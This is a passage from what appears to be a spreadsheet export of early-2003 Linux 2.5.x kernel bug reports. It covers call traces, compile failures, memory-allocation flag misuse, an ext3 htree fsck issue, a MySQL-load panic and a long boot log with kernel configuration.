idescsi_abort+0x116/0x120 [&lt;c034a6ac&gt;] idescsi_abort+0x0/0x120 [&lt;c031ce89&gt;] scsi_try_to_abort_cmd+0x83/0xaa [&lt;c031cfb5&gt;] scsi_eh_abort_cmd+0x33/0x64 [&lt;c031cf82&gt;] scsi_eh_abort_cmd+0x0/0x64 [&lt;c031d897&gt;] scsi_unjam_host+0xa1/0xea [&lt;c0109e8b&gt;] __down_failed_interruptible+0x7/0xc [&lt;c031d9bb&gt;] scsi_error_handler+0xdb/0x11c [&lt;c031d8e0&gt;] scsi_error_handler+0x0/0x11c [&lt;c0108c65&gt;] kernel_thread_helper+0x5/0xc bad: scheduling while atomic! Call Trace: [&lt;c011e242&gt;] schedule+0x34e/0x354 [&lt;c0109c2e&gt;] __down+0xa4/0x11a [&lt;c011e298&gt;] default_wake_function+0x0/0x12 [&lt;c012a51a&gt;] add_timer+0x7a/0xb8 [&lt;c0109e80&gt;] __down_failed+0x8/0xc [&lt;c031ddbd&gt;] .text.lock.scsi_error+0x8e/0xa9 [&lt;c031d46e&gt;] scsi_sleep_done+0x0/0x12 [&lt;c034a7c2&gt;] idescsi_abort+0x116/0x120 [&lt;c034a6ac&gt;] idescsi_abort+0x0/0x120 [&lt;c031ce89&gt;] scsi_try_to_abort_cmd+0x83/0xaa [&lt;c031cfb5&gt;] scsi_eh_abort_cmd+0x33/0x64 [&lt;c031cf82&gt;] scsi_eh_abort_cmd+0x0/0x64 [&lt;c031d897&gt;] scsi_unjam_host+0xa1/0xea [&lt;c0109e8b&gt;] __down_failed_interruptible+0x7/0xc [&lt;c031d9bb&gt;] scsi_error_handler+0xdb/0x11c [&lt;c031d8e0&gt;] scsi_error_handler+0x0/0x11c [&lt;c0108c65&gt;] kernel_thread_helper+0x5/0xc bad: scheduling while atomic! Call Trace: [&lt;c011e242&gt;] schedule+0x34e/0x354 [&lt;c0109c2e&gt;] __down+0xa4/0x11a [&lt;c011e298&gt;] default_wake_function+0x0/0x12 [&lt;c012a51a&gt;] add_timer+0x7a/0xb8 [&lt;c0109e80&gt;] __down_failed+0x8/0xc [&lt;c031ddbd&gt;] .text.lock.scsi_error+0x8e/0xa9 [&lt;c031d46e&gt;] scsi_sleep_done+0x0/0x12 [&lt;c034a7c2&gt;] idescsi_abort+0x116/0x120 [&lt;c034a6ac&gt;] idescsi_abort+0x0/0x120 [&lt;c031ce89&gt;] scsi_try_to_abort_cmd+0x83/0xaa [&lt;c031cfb5&gt;] scsi_eh_abort_cmd+0x33/0x64 [&lt;c031cf82&gt;] scsi_eh_abort_cmd+0x0/0x64 [&lt;c031d897&gt;] scsi_unjam_host+0xa1/0xea [&lt;c0109e8b&gt;] __down_failed_interruptible+0x7/0xc [&lt;c031d9bb&gt;] scsi_error_handler+0xdb/0x11c [&lt;c031d8e0&gt;] scsi_error_handler+0x0/0x11c [&lt;c0108c65&gt;] kernel_thread_helper+0x5/0xc bad: scheduling while atomic! Call Trace: [&lt;c011e242&gt;] schedule+0x34e/0x354 [&lt;c0109c2e&gt;] __down+0xa4/0x11a [&lt;c011e298&gt;] default_wake_function+0x0/0x12 [&lt;c012a51a&gt;] add_timer+0x7a/0xb8 [&lt;c0109e80&gt;] __down_failed+0x8/0xc [&lt;c031ddbd&gt;] .text.lock.scsi_error+0x8e/0xa9 [&lt;c031d46e&gt;] scsi_sleep_done+0x Steps to reproduce:</t>
  </si>
  <si>
    <t>OSS: Error compiling ad1848</t>
  </si>
  <si>
    <t>2.5.62-bk7</t>
  </si>
  <si>
    <t>2003-02-24 06:32 UTC</t>
  </si>
  <si>
    <t>2003-02-27 09:07 UTC</t>
  </si>
  <si>
    <t>Alexander Nyberg</t>
  </si>
  <si>
    <t>ISAPNP sleeping function called from illegal context</t>
  </si>
  <si>
    <t>2003-02-24 10:01 UTC</t>
  </si>
  <si>
    <t>2003-02-26 08:18 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: x86 Software Environment: CONFIG_PCI=y CONFIG_PCI_NAMES=y CONFIG_ISA=y CONFIG_PNP=y CONFIG_PNP_NAMES=y CONFIG_PNP_CARD=y CONFIG_ISAPNP=y CONFIG_PNPBIOS=y CONFIG_DEBUG_KERNEL=y CONFIG_DEBUG_STACKOVERFLOW=y CONFIG_DEBUG_SLAB=y CONFIG_DEBUG_IOVIRT=y CONFIG_MAGIC_SYSRQ=y CONFIG_DEBUG_SPINLOCK=y CONFIG_KALLSYMS=y CONFIG_DEBUG_SPINLOCK_SLEEP=y CONFIG_FRAME_POINTER=y Problem Description: 2.5.62-bk7 prints this on bootup. Last kernel tried, bk4, doesn't do this. isapnp: Scanning for PnP cards... Debug: sleeping function called from illegal context at mm/slab.c:1617 Call Trace: [&lt;c0118ccc&gt;] __might_sleep+0x54/0x58 [&lt;c013d89b&gt;] kmalloc+0x5f/0x140 [&lt;c01f9633&gt;] pnp_alloc+0x13/0x54 [&lt;c01fb6ef&gt;] pnp_add_change+0x13/0x84 [&lt;c01fba76&gt;] pnp_next_config+0x2a/0xcc [&lt;c01fbc5c&gt;] pnp_advanced_config+0x144/0x2a8 [&lt;c01fc2c6&gt;] pnp_auto_config_dev+0x3e/0x44 [&lt;c01f9b86&gt;] __pnp_add_device+0x18a/0x1ac [&lt;c01fee3c&gt;] pnpc_add_card+0x204/0x21c [&lt;c010519b&gt;] init+0xc3/0x288 [&lt;c01050d8&gt;] init+0x0/0x288 [&lt;c01071f1&gt;] kernel_thread_helper+0x5/0xc isapnp: Card 'SYM 53C416' isapnp: Card 'CS4236B' isapnp: 2 Plug &amp; Play cards detected total Steps to reproduce:</t>
  </si>
  <si>
    <t>turning off htree causes fsck to complain</t>
  </si>
  <si>
    <t>2003-02-24 11:42 UTC</t>
  </si>
  <si>
    <t>2003-05-12 20:08 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: x86, IDE Software Environment: ext3+htree Problem Description: It seems that if you remove htree (tune2fs -O ^dir_index /dev/xxx), and do a fsck, it will complain about inodes with INDEX_FL flag set on filesystem without htree support. This isn't a big deal, but causes auto-fscks-on-boot to fail, and drop you to single-user mode, scaring the living crap out of the SysAdmin in the process. I don't know if tune2fs should remove the INDEX_FL flag when removing htree from an ext3 drive, or if the kernel can fix these (very minor) "errors". Or should I be complaining to the author of tune2fs? Steps to reproduce: Create/modify an ext3 partition with htree, force a directory optimization with e2fsck -D /dev/xxx, then remove htree, and fsck again. You'll get lots of these: Inode 1999038 has INDEX_FL flag set on filesystem without htree support. Clear HTree index&lt;y&gt;? yes Inode 2015948 has INDEX_FL flag set on filesystem without htree support. Clear HTree index&lt;y&gt;? yes Inode 2033401 has INDEX_FL flag set on filesystem without htree support. Clear HTree index&lt;y&gt;? yes Inode 2051968 has INDEX_FL flag set on filesystem without htree support. Clear HTree index&lt;y&gt;? yes</t>
  </si>
  <si>
    <t>Keyboard glitch detected, ignoring keypress</t>
  </si>
  <si>
    <t>2.5.62-ac1</t>
  </si>
  <si>
    <t>2003-02-25 17:42 UTC</t>
  </si>
  <si>
    <t>Stephen Torri</t>
  </si>
  <si>
    <t>2003-03-06 13:21 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat beta (Phoebe) Hardware Environment: Intel Software Environment: Problem Description: I am getting the keyboard glitch detected, ignoring keypress message every few seconds when I boot into kernel 2.5.62-ac1. Steps to reproduce: 1) Built kernel-2.5.62-ac1 (patched 2.5.16 with ac patch) 2) Installed and rebooted machine. 3) Problem will start appearing as the user logs in. Kernel config: (Not sure what else is required) # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y # CONFIG_MOUSE_SERIAL is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set</t>
  </si>
  <si>
    <t>PROBLEM: with 3c509.c cant compile</t>
  </si>
  <si>
    <t>2003-02-26 03:06 UTC</t>
  </si>
  <si>
    <t>Dishko Georgiev</t>
  </si>
  <si>
    <t>2003-02-26 03:35 UTC</t>
  </si>
  <si>
    <t>gcc -Wp,-MD,drivers/net/.3c509.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict- prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe - mpreferred-stack-boundary=2 -march=i586 -Iinclude/asm-i386/mach-default -fomit- frame-pointer -nostdinc -iwithprefix include -DMODULE -DKBUILD_BASENAME=3c509 - DKBUILD_MODNAME=3c509 -c -o drivers/net/3c509.o drivers/net/3c509.c drivers/net/3c509.c: In function 'el3_probe': drivers/net/3c509.c:388: too many arguments to function 'pnp_activate_dev' drivers/net/3c509.c: At top level: drivers/net/3c509.c:207: warning: 'el3_device_remove' declared 'static' but never defined make[2]: *** [drivers/net/3c509.o] Error 1 make[1]: *** [drivers/net] Error 2 make: *** [drivers] Error 2</t>
  </si>
  <si>
    <t>[EHCI] report of first interrupt transfer is delayed</t>
  </si>
  <si>
    <t>2.5.63-bk2 to 2.5.64-ac1</t>
  </si>
  <si>
    <t>2003-02-26 13:10 UTC</t>
  </si>
  <si>
    <t>2003-06-13 11:40 UTC</t>
  </si>
  <si>
    <t>Distribution: Red Hat Raw Hide (up to date as of 26.02.2003) Hardware Environment: http://www.giga-byte.com/products/7vax.htm (Via KT 400 + Via VT 8235 + Realtek RTL8100BL), F9 bios, external USB2 hub, usb keyboard &amp; mouse plugged on the external hub Problem Description: At startup time hid mouse pointer won't move in gdm till any key is pressed on the hid keyboard This can get annoying for users that have the habit to move the mouse to un-blank the screen. This is really a minor bug, but I suppose it should be reported.</t>
  </si>
  <si>
    <t>pnp patches broke drivers/pcmcia/i82365.c</t>
  </si>
  <si>
    <t>2003-02-26 16:32 UTC</t>
  </si>
  <si>
    <t>2003-02-27 11:03 UTC</t>
  </si>
  <si>
    <t>Distribution:rawhide Hardware Environment:LX164/Alpha Software Environment:redhat Problem Description: Kernel fails to compile. An pnp update changed an argument list breaking existing code. Steps to reproduce: select the i62365 module for pcmicia Attempt to compile.</t>
  </si>
  <si>
    <t>aty128fb.c fails to compile (logic error)</t>
  </si>
  <si>
    <t>2003-02-26 17:18 UTC</t>
  </si>
  <si>
    <t>2003-06-11 09:37 UTC</t>
  </si>
  <si>
    <t>compile failure in drivers/atm/fore200e.c</t>
  </si>
  <si>
    <t>2.5.63-bk3</t>
  </si>
  <si>
    <t>2003-02-27 07:28 UTC</t>
  </si>
  <si>
    <t>2003-03-04 19:02 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4rc2 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.2, glibc 2.3.1, ld 2.13.90.0.18 Problem Description: gcc -Wp,-MD,drivers/atm/.fore200e.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -g -DKBUILD_BASENAME=fore200e -DKBUILD_MODNAME=fore_200e -c -o drivers/atm/.tmp_fore200e.o drivers/atm/fore200e.c drivers/atm/fore200e.c: In function `fore200e_push_rpd': drivers/atm/fore200e.c:1135: structure has no member named `timestamp' drivers/atm/fore200e.c:1136: structure has no member named `timestamp' make[2]: *** [drivers/atm/fore200e.o] Error 1 make[1]: *** [drivers/atm] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Networking support ---&gt; ATM drivers ---&gt; &lt;*&gt; FORE Systems 200E-series CONFIG_ATM_FORE200E_MAYBE=y</t>
  </si>
  <si>
    <t>Bad use of GFP_DMA</t>
  </si>
  <si>
    <t>2003-02-27 16:45 UTC</t>
  </si>
  <si>
    <t>2003-06-13 11:39 UTC</t>
  </si>
  <si>
    <t>./drivers/usb/net/pegasus.c: buffer = kmalloc(size, GFP_DMA); ./drivers/usb/net/pegasus.c: buffer = kmalloc(size, GFP_DMA); ./drivers/usb/net/pegasus.c: tmp = kmalloc(1, GFP_DMA); I think you really meant to use GFP_KERNEL for the first two, and the third should be allocated on the stack.</t>
  </si>
  <si>
    <t>Bad use of GFP_DMA in S390 drivers</t>
  </si>
  <si>
    <t>S390</t>
  </si>
  <si>
    <t>2003-02-27 21:18 UTC</t>
  </si>
  <si>
    <t>2003-04-15 11:25 UTC</t>
  </si>
  <si>
    <t>Arnd Bergmann</t>
  </si>
  <si>
    <t>GFP_DMA should always be ORed with GFP_ATOMIC or GFP_KERNEL, not used by itself: ./drivers/s390/cio/css.c: sch = kmalloc (sizeof (*sch), GFP_DMA); ./drivers/s390/cio/device.c: cdev-&gt;private = kmalloc(sizeof(struct ccw_device_private), GFP_DMA); ./drivers/s390/cio/device_ops.c: rcd_buf = kmalloc(ciw-&gt;count, GFP_DMA); ./drivers/s390/cio/qdio.c: irq_ptr=kmalloc(sizeof(struct qdio_irq),GFP_DMA); ./drivers/s390/cio/qdio.c: irq_ptr-&gt;qdr=kmalloc(sizeof(struct qdr),GFP_DMA); ./drivers/s390/net/netiucv.c: conn-&gt;rx_buff = alloc_skb(NETIUCV_BUFSIZE_DEFAULT, GFP_DMA); ./drivers/s390/net/netiucv.c: conn-&gt;tx_buff = alloc_skb(NETIUCV_BUFSIZE_DEFAULT, GFP_DMA);</t>
  </si>
  <si>
    <t>Panic from detach_pid</t>
  </si>
  <si>
    <t>2003-02-28 10:16 UTC</t>
  </si>
  <si>
    <t>2003-04-03 05:55 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 8.0 Hardware Environment: x86 8 processor system with 12Gb ram 2 30gb scsi, intel pro 1000 and 5 client systems Software Environment: MySql server on 8-way, version 3.23.52-3 dbgrinder.pl from ltp.sf.net on clients Problem Description: A MySql database server running on an 8-way x86 system with load driven from 5 clients (7 instances of dbgrinder.pl on each system) produces the following panic. oops : 0002 cpu : 5 eip : 0060:[&lt;c0131254&gt;] Not tainted eflags : 00010046 eip is at detach_pid + 0x1c/0xd4 eax: 6b6b6b6b ebx: 00000002 ecx: 6b6b6b6b edx: 6b6b6b6b esi: edce6720 edi: 00004570 ebp: e0a05f1c exp: e0a05f10 ds: 007b es: 007b ss: 0068 Process mysqld (pid: 919, threadinfo=e0a04000 task=cafb7380) Stack: edce6720 edce6720 00004570 e0a05f28 c01210d9 edcd6720 e0a05f44 c012127a edce6720 edce6720 edce6720 00000000 edce6729 e0a05f64 c0122dfa edce6720 cafb741c edce67c4 edce6720 00000000 00000246 e0a05fbc c0123143 edce6720 Call Trace: [&lt;c01210d9&gt;] --unhash_process +0x39/0x14c [&lt;c012127a&gt;] release_task +0x8e/0x1a0 [&lt;c0122dfa&gt;] wait_task_zombie +0x19a/0x1b4 [&lt;c0123143&gt;] sys_wait4 +0x137/0x264 [&lt;c011b518&gt;] default_wake_function +0x0/0x1c [&lt;c0109297&gt;] syscall_call +0x7/0xb Code: 89 50 04 89 02 f0 ff 49 04 0f 94 c0 84 c0 0f 84 98 00 00 00 &lt;6&gt; Note: mysqld[919] exited with preempt_count 1 Steps to reproduce: 1.)Install and start up Mysql on server, 2.)Install dbgrinder.pl on 5 client systems Note: this will require DBI and DBD:mysql from cpan.org 3.)Execute 7 instances of dbgringer.pl on each client all pointed at the server, within 1 hour the server will panic</t>
  </si>
  <si>
    <t>compiler warning from sound/pci/ac97/ac97_codec.c</t>
  </si>
  <si>
    <t>2003-02-28 12:01 UTC</t>
  </si>
  <si>
    <t>2003-03-17 15:52 UTC</t>
  </si>
  <si>
    <t>compiler warning (gcc 2.95.4) sound/pci/ac97/ac97_codec.c: In function `snd_ac97_tune_hardware': sound/pci/ac97/ac97_codec.c:2477: warning: unused variable `q' Oddly, it doesn't seem to have a variable called 'q'.</t>
  </si>
  <si>
    <t>make -j X bzImage gives a warning</t>
  </si>
  <si>
    <t>2003-02-28 12:49 UTC</t>
  </si>
  <si>
    <t>2003-03-02 10:55 UTC</t>
  </si>
  <si>
    <t>make -j X bzImage gives a warning: make[1]: warning: jobserver unavailable: using -j1. Add `+' to parent make rule. Can we get rid of this one way or the other?</t>
  </si>
  <si>
    <t>USB Microsoft IntelliMouse does not work with latest 2.5.63-bk</t>
  </si>
  <si>
    <t>2.5.63-bk</t>
  </si>
  <si>
    <t>2003-03-01 22:53 UTC</t>
  </si>
  <si>
    <t>khromy</t>
  </si>
  <si>
    <t>2003-10-06 20:57 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Software Environment: Problem Description: USB mouse does not work with latest 2.5.63-bk, works fine with 2.5.62-mm2. CONFIG_USB=y CONFIG_USB_UHCI_HCD=y CONFIG_USB_HID=y CONFIG_USB_HIDINPUT=y</t>
  </si>
  <si>
    <t>No USB on 2.5.61, 62 or 63.</t>
  </si>
  <si>
    <t>2003-03-01 23:36 UTC</t>
  </si>
  <si>
    <t>Gregg (Geek)</t>
  </si>
  <si>
    <t>2003-10-06 20:58 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Woody (3.0) Hardware Environment: Asus P7V, AMI BIOS, Cyrix-III 700MHz, 128Mb RAM, 30Gig Fuji. Software Environment: Using mod-init-tools 0.9.9 Problem Description: No USB I/O since upgrade from 2.4.x series. Kernel installed either make-kpkg or bzImage, same thing. Steps to reproduce: I compile all my kernels monolithic. Command # mount -t vfat /dev/sda1 /mnt/camera for HP120 works on 2.4.x but not 2.5.61-63. sane-find-scanner reports scanner on 2.4.x, not on 2.5.61-63. Boot: Linux version 2.5.63 (root@debian) (gcc version 2.95.4 20011002 (Debian prerelease)) #1 Sat Mar 1 21:12:47 PST 2003 Video mode to be used for restore is ffff BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009fc00 (usable) BIOS-e820: 000000000009fc00 - 00000000000a0000 (reserved) BIOS-e820: 00000000000dc000 - 00000000000e0000 (reserved) BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 0000000007000000 (usable) BIOS-e820: 00000000ffff0000 - 0000000100000000 (reserved) 112MB LOWMEM available. On node 0 totalpages: 28672 DMA zone: 4096 pages, LIFO batch:1 Normal zone: 24576 pages, LIFO batch:6 HighMem zone: 0 pages, LIFO batch:1 Building zonelist for node : 0 Kernel command line: BOOT_IMAGE=Linux-2.5.63 ro root=307 hdc=ide-scsi ide_setup: hdc=ide-scsi No local APIC present or hardware disabled Initializing CPU#0 PID hash table entries: 512 (order 9: 4096 bytes) Detected 666.224 MHz processor. Console: colour VGA+ 80x25 Calibrating delay loop... 1310.72 BogoMIPS Memory: 109724k/114688k available (1961k kernel code, 4420k reserved, 842k data, 116k init, 0k highmem) Checking if this processor honours the WP bit even in supervisor mode... Ok. Dentry cache hash table entries: 16384 (order: 5, 131072 bytes) Inode-cache hash table entries: 8192 (order: 4, 65536 bytes) Mount-cache hash table entries: 512 (order: 0, 4096 bytes) -&gt; /dev -&gt; /dev/console -&gt; /root CPU: L1 I Cache: 64K (32 bytes/line), D cache 64K (32 bytes/line) CPU: After generic, caps: 008031b5 808030b5 00000000 00000000 CPU: Centaur VIA Samuel stepping 02 Checking 'hlt' instruction... OK. POSIX conformance testing by UNIFIX Linux NET4.0 for Linux 2.4 Based upon Swansea University Computer Society NET3.039 Initializing RT netlink socket mtrr: v2.0 (20020519) PCI: PCI BIOS revision 2.10 entry at 0xfdb01, last bus=1 PCI: Using configuration type 1 BIO: pool of 256 setup, 14Kb (56 bytes/bio) biovec pool[0]: 1 bvecs: 212 entries (12 bytes) biovec pool[1]: 4 bvecs: 212 entries (48 bytes) biovec pool[2]: 16 bvecs: 212 entries (192 bytes) biovec pool[3]: 64 bvecs: 212 entries (768 bytes) biovec pool[4]: 128 bvecs: 106 entries (1536 bytes) biovec pool[5]: 256 bvecs: 53 entries (3072 bytes) Linux Plug and Play Support v0.95 (c) Adam Belay pnp: Enabling Plug and Play Card Services. block request queues: 128 requests per read queue 128 requests per write queue 8 requests per batch enter congestion at 15 exit congestion at 17 SCSI subsystem initialized drivers/usb/core/usb.c: registered new driver usbfs drivers/usb/core/usb.c: registered new driver hub PCI: Probing PCI hardware PCI: Probing PCI hardware (bus 00) PCI: Using IRQ router ALI [10b9/1533] at 00:07.0 PCI: IRQ 0 for device 00:0f.0 doesn't match PIRQ mask - try pci=usepirqmask PCI: Hardcoded IRQ 14 for device 00:0f.0 apm: BIOS version 1.2 Flags 0x03 (Driver version 1.16ac) Total HugeTLB memory allocated, 0 aio_setup: sizeof(struct page) = 40 Installing knfsd (copyright (C) 1996 okir@monad.swb.de). EFS: 1.0a - http://aeschi.ch.eu.org/efs/ udf: registering filesystem Initializing Cryptographic API parport0: PC-style at 0x378 [PCSPP(,...)] pty: 256 Unix98 ptys configured lp0: using parport0 (polling). ppdev: user-space parallel port driver Linux agpgart interface v0.100 (c) Dave Jones agpgart: Detected ALi M1631 chipset agpgart: Maximum main memory to use for agp memory: 79M agpgart: AGP aperture is 64M @ 0xd8000000 Floppy drive(s): fd0 is 1.44M FDC 0 is a post-1991 82077 RAMDISK driver initialized: 16 RAM disks of 4096K size 1024 blocksize loop: loaded (max 8 devices) sis900.c: v1.08.06 9/24/2002 PCI: Found IRQ 9 for device 00:0e.0 eth0: SiS 900 Internal MII PHY transceiver found at address 1. eth0: Using transceiver found at address 1 as default eth0: SiS 900 PCI Fast Ethernet at 0xdc00, IRQ 9, 00:d0:09:a1:db:c2. PPP generic driver version 2.4.2 Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx ALI15X3: IDE controller at PCI slot 00:0f.0 PCI: Hardcoded IRQ 14 for device 00:0f.0 ALI15X3: chipset revision 194 ALI15X3: not 100% native mode: will probe irqs later ide0: BM-DMA at 0xffa0-0xffa7, BIOS settings: hda:DMA, hdb:pio ide1: BM-DMA at 0xffa8-0xffaf, BIOS settings: hdc:pio, hdd:pio hda: FUJITSU MPG3307AT F, ATA DISK drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 hdc: LG CD-RW CED-8081B, ATAPI CD/DVD-ROM drive ide1 at 0x170-0x177,0x376 on irq 15 hda: host protected area =&gt; 1 hda: 60046560 sectors (30744 MB) w/2048KiB Cache, CHS=59570/16/63, UDMA(33) hda: hda1 hda2 &lt; hda5 hda6 hda7 hda8 hda9 &gt; ide-floppy driver 0.99.newide scsi0 : SCSI host adapter emulation for IDE ATAPI devices Vendor: LG Model: CD-RW CED-8081B Rev: 1.00 Type: CD-ROM ANSI SCSI revision: 02 sr0: scsi3-mmc drive: 32x/32x writer cd/rw xa/form2 cdda tray Uniform CD-ROM driver Revision: 3.12 Attached scsi CD-ROM sr0 at scsi0, channel 0, id 0, lun 0 drivers/usb/host/uhci-hcd.c: USB Universal Host Controller Interface driver v2.0 drivers/usb/core/usb.c: registered new driver usblp drivers/usb/class/usblp.c: v0.13: USB Printer Device Class driver Initializing USB Mass Storage driver... drivers/usb/core/usb.c: registered new driver usb-storage USB Mass Storage support registered. drivers/usb/core/usb.c: registered new driver hid drivers/usb/input/hid-core.c: v2.0:USB HID core driver drivers/usb/core/usb.c: registered new driver usbscanner drivers/usb/image/scanner.c: 0.4.10:USB Scanner Driver mice: PS/2 mouse device common for all mice input: ImPS/2 Logitech Wheel Mouse on isa0060/serio1 serio: i8042 AUX port at 0x60,0x64 irq 12 input: AT Set 2 keyboard on isa0060/serio0 serio: i8042 KBD port at 0x60,0x64 irq 1 PCI: Found IRQ 11 for device 00:12.0 ymfpci: YMF724F at 0xdfff0000 IRQ 11 ac97_codec: AC97 Audio codec, id: AKM1 (Asahi Kasei AK4542) YM3812 and OPL-3 driver Copyright (C) by Hannu Savolainen, Rob Hooft 1993-1996 NET4: Linux TCP/IP 1.0 for NET4.0 IP: routing cache hash table of 512 buckets, 4Kbytes TCP: Hash tables configured (established 8192 bind 8192) ip_conntrack version 2.1 (896 buckets, 7168 max) - 304 bytes per conntrack ip_tables: (C) 2000-2002 Netfilter core team NET4: Unix domain sockets 1.0/SMP for Linux NET4.0. IPv6 v0.8 for NET4.0 IPv6 over IPv4 tunneling driver VFS: Mounted root (ext2 filesystem) readonly. Freeing unused kernel memory: 116k freed Adding 248968k swap on /dev/hda8. Priority:-1 extents:1 Please use the 'usbfs' filetype instead, the 'usbdevfs' name is deprecated. warning: process `update' used the obsolete bdflush system call Fix your initscripts? eth0: Media Link On 10mbps half-duplex .config: # # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_SWAP=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y # # General setup # CONFIG_SYSVIPC=y # CONFIG_BSD_PROCESS_ACCT is not set CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=14 # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y # CONFIG_MODULE_FORCE_UNLOAD is not set CONFIG_OBSOLETE_MODPARM=y CONFIG_MODVERSIONS=y CONFIG_KMOD=y # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set # CONFIG_MK7 is not set # CONFIG_MK8 is not set # CONFIG_MELAN is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set CONFIG_MCYRIXIII=y # CONFIG_MVIAC3_2 is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=5 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_ALIGNMENT_16=y CONFIG_X86_TSC=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_USE_3DNOW=y CONFIG_HUGETLB_PAGE=y # CONFIG_SMP is not set CONFIG_PREEMPT=y CONFIG_X86_UP_APIC=y CONFIG_X86_UP_IOAPIC=y CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_X86_MCE=y # CONFIG_X86_MCE_NONFATAL is not set # CONFIG_X86_MCE_P4THERMAL is not set # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_MICROCODE is not set CONFIG_X86_MSR=y CONFIG_X86_CPUID=y # CONFIG_EDD is not set CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set CONFIG_MATH_EMULATION=y CONFIG_MTRR=y CONFIG_HAVE_DEC_LOCK=y # # Power management options (ACPI, APM) # CONFIG_PM=y # CONFIG_SOFTWARE_SUSPEND is not set # # ACPI Support # # CONFIG_ACPI is not set CONFIG_APM=y # CONFIG_APM_IGNORE_USER_SUSPEND is not set CONFIG_APM_DO_ENABLE=y CONFIG_APM_CPU_IDLE=y # CONFIG_APM_DISPLAY_BLANK is not set # CONFIG_APM_RTC_IS_GMT is not set # CONFIG_APM_ALLOW_INTS is not set CONFIG_APM_REAL_MODE_POWER_OFF=y # # CPU Frequency scaling # # CONFIG_CPU_FREQ is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y # CONFIG_SCx200 is not set # CONFIG_PCI_LEGACY_PROC is not set CONFIG_PCI_NAMES=y # CONFIG_ISA is not set # CONFIG_MCA is not set CONFIG_HOTPLUG=y # # PCMCIA/CardBus support # # CONFIG_PCMCIA is not set # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_KCORE_ELF=y # CONFIG_KCORE_AOUT is not set CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_ELF=y CONFIG_BINFMT_MISC=y # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=y CONFIG_PARPORT_PC=y # CONFIG_PARPORT_PC_FIFO is not set # CONFIG_PARPORT_PC_SUPERIO is not set # CONFIG_PARPORT_OTHER is not set # CONFIG_PARPORT_1284 is not set # # Plug and Play support # CONFIG_PNP=y CONFIG_PNP_NAMES=y CONFIG_PNP_CARD=y # CONFIG_PNP_DEBUG is not set # # Protocols # # CONFIG_ISAPNP is not set # CONFIG_PNPBIOS is not set # # Block devices # CONFIG_BLK_DEV_FD=y # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set CONFIG_BLK_DEV_LOOP=y CONFIG_BLK_DEV_NBD=y CONFIG_BLK_DEV_RAM=y CONFIG_BLK_DEV_RAM_SIZE=4096 # CONFIG_BLK_DEV_INITRD is not set # CONFIG_LBD is not set # # ATA/ATAPI/MFM/RLL device support # CONFIG_IDE=y # # IDE, ATA and ATAPI Block devices # CONFIG_BLK_DEV_IDE=y # # Please see 